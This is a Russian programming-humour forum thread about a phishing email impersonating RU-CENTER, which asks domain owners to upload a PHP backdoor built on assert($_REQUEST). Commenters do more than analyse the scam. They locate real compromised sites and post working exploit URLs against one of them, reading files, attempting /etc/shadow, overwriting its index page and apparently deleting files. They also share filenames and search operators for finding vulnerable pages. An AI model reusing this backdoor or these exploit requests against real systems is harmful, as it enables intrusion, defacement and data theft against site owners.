1. PHP / Говнокод #21954

    +8

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    Уважаемый клиент!
    
    В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить,
    что фактическое управление доменом ******* осуществляется лицом,
    указанным в качестве его администратора.
    
    Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом,
    создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим
    содержимым:
    
    <?php
    assert(stripslashes($_REQUEST[RUCENTER]));
    ?>
    
    Файл должен быть создан в течение трех рабочих дней с момента получения
    настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00
    (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
    
    Обращаем Ваше внимание на то, что если процедура подтверждения не будет
    пройдена, делегирование домена будет приостановлено.
    
    © АО «Региональный Сетевой Информационный Центр» (RU-CENTER)
    8 800 775-29-99, 8 800 250-27-99,
    +7 495 994-46-01
    
    Вы подписались на рассылку в настройках уведомлений.
    Отписаться от рассылки

    Мошеннические письма под видом писем от RU-CENTER

    интересно, почему не eval() ?

    Запостил: j123123, 07 Января 2017

    Комментарии (104) RSS

    • PHP - гениальный язык.
      Интересно, в какой функции здесь remote code execution - в stripslashes или в assert? Не удивлюсь, если в обоих.
      Ответить
      • If the assertion is given as a string it will be evaluated as PHP code by assert(). The advantages of a string assertion are less overhead when assertion checking is off and messages containing the assertion expression when an assertion fails.

        Царь проектировал.
        Ответить
    • > интересно, почему не eval() ?
      Более подозрительная питушня. Если не знаешь пхп в совершенстве, не начнёшь подозревать assert.
      Ответить
      • василии™ с пыхой на сервере должны страдать
        Ответить
      • А много ли людей знают пхп в совершенстве?
        Ответить
        • полагаю, все те, кто хоть раз открывал "PHP для проффессионналов"
          Ответить
        • Наверно нет. Люди в большинстве случаев либо не знают PHP, либо используют другие языки. Прослойка профессионалов в PHP крайне мала. Людей не хватает, они за очень большие деньги пишут Facebook и рассылают письма от имени RU-CENTER.
          Ответить
          • Дейтинги, дейтинги ещё. За большие деньги. Большие.
            Ответить
            • Дейтинги?
              Это где сорокапятиилетний жадный девственник с лысиной, пузом и отдышкой, живущий с мамой, и любящий играть в танчики пытается найти девушку своей мечты?
              Ответить
              • Помню, писал когда-то индексирующего бота для мамбы. Потом мамба добавила капчу. Я аж загордился тогда.
                Ответить
                • > индексирующего бота
                  Надо было ещё ИИ для знакомства.
                  Ответить
                  • Не, разводом дрочеров на "кинь мне денег на телефон и я позвоню" не занимался. Так, базка для личного пользования, чтобы искать по параметрам не тем куцым мамбиным поиском. И, что интересно, пару раз успешно использовал.
                    Ответить
                    • Искал себе спутницу жизни на мамбе?

                      Фу
                      Ответить
                      • Зачем сразу "фу"? Он мог там искать и спутника.
                        Ответить
                        • Нашел тебе спутника, проверь
                          Ответить
                          • Плохой спутник. Прошу вернуть деньги. Чек прилагаю.
                            Ответить
                            • Держи деньги, отослал спутника твоей мамке, проверь.
                              Ответить
                • На чем? Готовые поисковые движки не использовал?

                  Капча то хуйня, в общем-то.
                  Ответить
                  • Вспомню - вздрогну. Classic ASP, JScript. Вытягивалась страница, парсилась регэкспами (ага-ага, странно, что Ктулху не вызвал), потом вытягивалась следующая, и так далее. Брр. Но работало.
                    Ответить
                    • По какой-то причине практически весь классик асп, коий я видел в жизни, был не на JS а на VBS.
                      Сложно сказать что хуже.
                      Ответить
                      • По идее, JS позволяет писать более изящно. Но это был 2005 год, и слова "JS" и "изящность" в одном предложении никто по-моему не употреблял.
                        Ответить
    • Узбекский вирус 2.0 штоле? (Sorry, PHP is not my native language)
      Ответить
    • Если хоть 1 долбоёб из 100 поведётся - уже профит
      Ответить
    • a7offau08fn0f81n.php:

      <?php
      echo 'Хакнуть меня тут решил, пездюк?';
      ?>
      Ответить
    • Не у всех даже получается залить себе этот бекдор
      http://psyaba.ru/index/a7offau08fn0f81n_php/0-31
      http://monrostudio.ru/a7offau08fn0f81n-php
      Ответить
      • А если и получится - надо же ещё ассёрты включить в конфиге...
        Ответить
        • Кому-то даже удалось залить:
          http://www.balans-auto.ru/a1offau08f10z81n.php
          Ответить
          • P.S. Работает!

            http://www.balans-auto.ru/a1offau08f10z81n.php?R01=printf('TbI+XYU ');
            http://www.balans-auto.ru/a1offau08f10z81n.php?R01=phpinfo();
            Ответить
            • А рута нет, печалька:
              http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(file('/etc/shadow'));
              Ответить
              • DirtyCOW попробуй
                Ответить
                • Попробуем выяснить, что можно натворить без рута:
                  http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(scandir('/home/c17271/public_html'));
                  Ответить
                  • file_put_contents работает:
                    http://www.balans-auto.ru/a1offau08f10z81n.php?R01=file_put_contents%28%27/home/c17271/public_html/balans-auto/index.html%27,%20%27%3Cmeta%20http-equiv=%22Content-Type%22%20content=%22text/html;%20charset=UTF-8%22%3E%3Cp%3E%D0%97%D0%B4%D0%B5%D1%81%D1%8C%20%D0%B1%D1%8B%D0%BB%20%D0%92%D0%B0%D1%81%D1%8F.%3C/p%3E%27%29;


                    Пруф, что сработало, проверьте:
                    http://www.balans-auto.ru/
                    Ответить
                    • учитывая, что до тебя там вообще нихуя не было, это есть ловкий ход владельца

                      через неделю ему напишут сайт-визитку, а через три он обеспечит прибылью своих внуков
                      Ответить
                      • А потом кто-нибудь захочет узнать историю компании, загуглит доменное имя и попадёт на Говнокод, где написано про анналы и багры.
                        Ответить
                      • created: 2010.01.26
                        paid-till: 2017.01.26

                        вебархив дает странную картину, в 2014 было че-то, в 2015 уже грусть
                        Ответить
                        • > в 2015 уже грусть
                          Кто-то проверил, что работает unlink()?
                          Ответить
                          • Почему бы и нет, если народ требует? Здесь каждый день по сто раз умоляют что-нибудь проверить.
                            Ответить
                            • Только почему-то проверяют не всё, а выборочно.
                              Ответить
                              • ничего, пережили же плавающего питуха, анскильного питуха

                                огромного питуха тут тоже переживут
                                Ответить
                              • Ну, а тебе не надоело по десять раз на дню находить за своей щекой всё новые и новые сюрпризы?
                                Ответить
                                • Проверял, сюрпризов не было. Как год назад залечил зубы, так с той поры пока не беспокоили.
                                  Ответить
                                  • Могу и побеспокоить, если опостылело однообразие жизни.
                                    Ответить
                    • Проверил. Работает.

                      P.S.: Я про "unlink()".
                      Ответить
                    • Шло девятое января. Владельцу сайта всё так же было похуй на багры и на то, что кто-то кого-то ебал во все дыры...
                      Ответить
                      • Отмотаем время на сто шагов назад...

                        2 октября 2016: Приветствуем! Сайт balans-auto.ru только что создан.

                        7 марта 2016: Приветствуем! Сайт balans-auto.ru только что создан.

                        9 января 2016: Приветствуем! Сайт balans-auto.ru только что создан.

                        16 ноября 2015: Приветствуем! Сайт balans-auto.ru только что создан.

                        1 августа 2015: Приветствуем! Сайт balans-auto.ru только что создан.

                        16 декабря 2014: Автоломбард по займу денег в Москве - +7929-636-7575 Круглосуточно

                        Таким образом, сайт исчез в промежутке между 16 декабря 2014 и 1 августа 2015. Значит, владельцу похуй уже полтора-два года.
                        Ответить
      • Я надеялся, там уникальный идентификатор, а оказалось, что этот id одинаков для всех...

        http://oknacolor.ru/a7offau08fn0f81n.php

        P.S. Гуглим ещё это:
        a7odfa980f11ce6.php
        a7offau12fn0f83f.php
        a1offau08f10z81n.php
        a1offau08fn0f81n.php
        Ответить
        • Кстати, а как гугл узнал, что надо проиндексировать эти страницы?
          Ответить
          • Возможно, у «кулхацкеров» было установлено какое-то браузерное расширение для анализа страниц, которое отправляет запросы на индексацию.

            Говорят, в своё время куча эсэмэсок, отправленных пользователям «Мегафона», утекли в сеть благодаря Яндекс.Бару, потому что там была авторизация через get-параметр.

            А за пользователями Хрома иногда ходит Гуглобот...
            Ответить
            • > авторизация через get-параметр
              facepalm.jpg
              Ответить
              • До сих пор на некоторых форумах есть эмуляция кук через get-параметр. Загугли:
                inurl:sessid
                inurl:sessionid
                inurl:session_id
                inurl:phpsessid
                inurl:phpsessionid
                inurl:phpsession_id

                И ещё что-нибудь в таком духе.

                Ещё некоторые сайты (сайты знакомств, интернет-магазины) присылают по е-мейлу уведомления о новых событиях, а в письмо вкладывают ссылку с токеном для авторизации. Если такая ссылка утечёт в поисковик, то поисковик сможет выполнять действия от твоего имени...
                Ответить
                • > поисковик сможет выполнять действия от твоего имени
                  Забавно будет, если действия тоже через get.
                  Ответить
                  • Довольно часто logout сделан через get. Если это будет первым действием, которое выполнит поисковик, то ничего интересного не произойдёт.
                    Ответить
                • Если токен не одноразовый, то ссзб.
                  Для пыхопитушни, однако, обычное дело

                  Более того, такой одноразовый токен и нужен то только для восстановления пароля. В остальных случаях юзера надо для начала на страницу логина сводить (если куки отсутствуют при достижении целевой страницы)
                  Ответить
                  • Делаем вывод: vkrugudruzei.ru и fotostrana.ru — пыхопитушня. А ведь на них обитают несколько миллионов пользователей...
                    Ответить
                    • Ну пейсбук и втентакль тоже пыхопетушня...
                      Ответить
                      • На них (по крайней мере, сейчас) нет такой чепухи с get-параметрами.

                        Говорят, что в Одноклассниках когда-то давным давно sessionid был в get-параметрах, но потом убрали.
                        Ответить
                        • > Одноклассниках
                          Зато они логин по хттп до последнего держали.
                          Ответить
                          • Более того, у них был редирект с https на http, если в форме логина не поставить галочку «использовать шифрование». Только недавно исправили.
                            Ответить
                            • Там была такая галочка?

                              З.Ы. Кстати, на рутрекере она тоже есть.
                              Ответить
                              • Да. Они работали по https, только если при логине установить галочку «Использовать шифрование», иначе редиректили на http. Т. е. пользователь должен был явно указать, что ему есть что скрывать от своего провайдера и от спецслужб.

                                Только несколько месяцев назад всех перевели на https и галочку убрали.
                                Ответить
                                • Или соседей по хотспоту. Или владельца прокси или ноды тора (актуально для русракера и порнолаба).
                                  Ответить
                              • P.S. Кстати, Рутрекер сейчас у меня по http заблокирован (отображается провайдерская заглушка), а по https работает.
                                Ответить
                                • > а по https работает
                                  Это у всех так, походу. В кои-то веки можно залогиниться и поюзать нормальный поиск...
                                  Ответить
                                  • С блокировками вообще весело. Бывает так, что сайт с www заблокирован, а без www работает. Или, например, заблокирована только главная страница.
                                    Ответить
                                  • >В кои-то веки можно залогиниться и поюзать нормальный поиск...
                                    Не понял.
                                    Ответить
                                    • Для гостей там только поиск гугла. А он неудобный - не показывает качество и т.п., приходится тупо ссылки подряд прокликивать.
                                      Ответить
                                      • >В кои-то веки можно залогиниться
                                        Ответить
                                        • Залогинился в твое очко, проверь.
                                          Ответить
                                          • Сменил пароль, проверь.
                                            Ответить
                                            • Доступ закрыт, произвожу вход в твою ротовую полость, проверь.
                                              Ответить
                                              • Вы входите из необычного местоположения. Код верификации отправлен Вам по SMS, проверьте.
                                                Ответить
                                                • Вот черт, телефон забыл в твоём анусе. После вибрации звонков и SMS - осталось на твоём лице блаженство.
                                                  Ответить
                                                  • накидал немного блаженства тебе за щеку,проверь
                                                    Ответить
                                        • > кои-то веки можно залогиниться
                                          Ну через тор-браузер неудобно же.
                                          Ответить
                                          • у меня фсбшный аддон frigate прекрасно справлялся с доступом к джойкрутрекеру все это время
                                            Ответить
                                            • > фсбшный аддон
                                              Да на крайний случай можно и голландцем прикинуться в пару команд... А аддоны я не люблю, да и ставить их лень.
                                              Ответить
                                            • Frigate ко всем запросам добавляет HTTP-заголовок Proxy-Authorization, содержащий уникальный идентификатор экземпляра аддона, проверь.
                                              Ответить
                                              • Так есть же https://antizapret.prostovpn.org/proxy.pac

                                                Там внутрях найдешь ты хттпс проксю, на которую можно ходить даже если сайт не забанен

                                                Правда никто не умеет в настройки прокси по хттпс без PAC: только хром может если сказать --proxy=
                                                Ответить
                      • Это же обсуждали здесь когда-то, там много что уже не на php, нет?
                        Ответить
    • Ничего, известная биржа фpиланса вообще была похекана через ссаный "WebDаv" с открытым портом.
      Ответить
    • Братишки, я ещё покушать принёс:
      http://kkblog.ru/phishing-spam/

      Прямая ссылка на скриншот, чтобы не читать много буков:
      http://kkblog.ru/wp-content/uploads/2016/12/rkn-phishing.png

      P.S.:
      https://habrahabr.ru/post/265515/
      Ответить
      • Кстати, а ведь неплохое заметание следов - написать статью на хабр. Хабронелюди всю траву вытопчут, настоящего хозяина ботнета потом хуй найдёшь среди них...
        Ответить
        • Почти как в шутке: «Убит спамер. Полиции осталось допросить 3 миллиона подозреваемых».
          Ответить

    Добавить комментарий